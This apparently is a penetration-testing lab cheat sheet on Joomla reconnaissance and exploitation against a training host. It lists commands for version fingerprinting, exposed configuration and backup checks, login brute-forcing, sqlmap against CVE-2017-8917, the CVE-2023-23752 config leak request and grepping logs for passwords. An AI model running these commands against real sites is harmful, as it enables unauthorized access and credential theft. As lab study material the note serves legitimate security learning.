3.-Joomla-discovery-and-enumeration

. Basic Joomla Identification

curl -s http://dev.inlanefreight.local/ | grep Joomla  # Check for Joomla in HTML source
curl -s http://dev.inlanefreight.local/robots.txt             # Check robots.txt for disallowed directories
curl -s http://dev.inlanefreight.local/README.txt              # Check for version information
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml # Detailed version info
curl -s http://dev.inlanefreight.local/plugins/system/cache/cache.xml # Approximate version info
curl -I http://dev.inlanefreight.local/favicon.ico # Check for Joomla default favicon.

2. Joomla Version Enumeration

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool # Joomla usage stats API
curl -I http://dev.inlanefreight.local/ | grep "X-Content-Encoded-By" # Joomla HTTP headers for version info
curl -s http://dev.inlanefreight.local/CHANGELOG.php # Check for changelog

3. Automated Scanning

Droopescan

sudo pip3 install droopescan
droopescan -h
droopescan scan joomla --url http://dev.inlanefreight.local/

JoomlaScan (Python 2.7)

sudo python2.7 -m pip install urllib3 certifi bs4
python2.7 joomlascan.py -u http://dev.inlanefreight.local/

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

5. Extension Enumeration (Manual)

curl -s http://dev.inlanefreight.local/components/
curl -s http://dev.inlanefreight.local/modules/
curl -s http://dev.inlanefreight.local/plugins/
curl -s http://dev.inlanefreight.local/templates/
curl -s http://dev.inlanefreight.local/media/

Check for JavaScript or CSS files:

curl -s http://dev.inlanefreight.local/components/com_content/assets/js/content.js

6. Configuration File & Backup File Checks

curl -s http://dev.inlanefreight.local/configuration.php  # Check for configuration exposure
curl -s http://dev.inlanefreight.local/configuration.php.bak
curl -s http://dev.inlanefreight.local/backup.zip
curl -s http://dev.inlanefreight.local/joomla.sql

7. Directory & File Enumeration

dirb http://dev.inlanefreight.local /usr/share/wordlists/dirb/common.txt

8. Joomla REST API Enumeration (If Enabled)

curl -s http://dev.inlanefreight.local/api/index.php/v1/users

9. Joomla CLI (If Accessible)

joomla user:list

10. Exploiting Known Joomla Vulnerabilities

SQL Injection (CVE-2017-8917)

sqlmap -u "http://dev.inlanefreight.local/index.php?option=com_content&id=1" --dbs --batch

Unauthenticated Admin Takeover (CVE-2023-23752)

curl -X GET "http://dev.inlanefreight.local/api/index.php/v1/config/application?public=true"

11. Joomla User Enumeration

curl -X POST -d "username=admin" http://dev.inlanefreight.local/index.php?option=com_users&view=reset

12. Joomla Debug Mode & Log File Checks

curl -s http://dev.inlanefreight.local/logs/error.php  # Check for error logs
curl -s http://dev.inlanefreight.local/logs/debug.log  # Check for debug logs

13. Extracting Sensitive Data from Logs

grep -i "password" logs/error.php

14. Checking for Default Credentials

joomla user:list --filter super --output=json | jq '.[].username'

15. Important Considerations

Version Fingerprinting:
- Accurate version identification is crucial for finding relevant exploits.
- Combine multiple methods (README, joomla.xml, cache.xml) for accuracy.
Extension Enumeration:
- Extensions are a common source of vulnerabilities.
- Manually examine directories and file paths for clues.
- Identify extension versions when possible.
Configuration File Exposure:
- The configuration.php file contains sensitive database credentials.
- Check for its presence and assess the risk of exposure.
Robots.txt:
- Carefully analyze robots.txt for disallowed directories that might reveal sensitive information.
Joomla Rest API:
- If enabled, the Joomla Rest API can expose sensitive data and functionalities.
- Test for common vulnerabilities and misconfigurations.
Joomla CLI:
- If you have shell access, the Joomla CLI can be used to gather information and manage the Joomla installation.
Vulnerability Databases:
- Use resources like the Joomla Vulnerability Center or CVE databases to find known exploits.
- Search for vulnerabilities related to the Joomla version and installed extensions.

Previous2.-Attacking-wordpress Next4.-Attacking-joomla

Last updated 8 months ago

hashtag. Basic Joomla Identification

hashtag2. Joomla Version Enumeration

hashtag3. Automated Scanning

hashtagDroopescan

hashtagJoomlaScan (Python 2.7)

hashtag4. Joomla Login Brute-Force

hashtag5. Extension Enumeration (Manual)

hashtag6. Configuration File & Backup File Checks

hashtag7. Directory & File Enumeration

hashtag8. Joomla REST API Enumeration (If Enabled)

hashtag9. Joomla CLI (If Accessible)

hashtag10. Exploiting Known Joomla Vulnerabilities

hashtagSQL Injection (CVE-2017-8917)

hashtagUnauthenticated Admin Takeover (CVE-2023-23752)

hashtag11. Joomla User Enumeration

hashtag12. Joomla Debug Mode & Log File Checks

hashtag13. Extracting Sensitive Data from Logs

hashtag14. Checking for Default Credentials

hashtag15. Important Considerations

. Basic Joomla Identification

2. Joomla Version Enumeration

3. Automated Scanning

Droopescan

JoomlaScan (Python 2.7)

4. Joomla Login Brute-Force

5. Extension Enumeration (Manual)

6. Configuration File & Backup File Checks

7. Directory & File Enumeration

8. Joomla REST API Enumeration (If Enabled)

9. Joomla CLI (If Accessible)

10. Exploiting Known Joomla Vulnerabilities

SQL Injection (CVE-2017-8917)

Unauthenticated Admin Takeover (CVE-2023-23752)

11. Joomla User Enumeration

12. Joomla Debug Mode & Log File Checks

13. Extracting Sensitive Data from Logs

14. Checking for Default Credentials

15. Important Considerations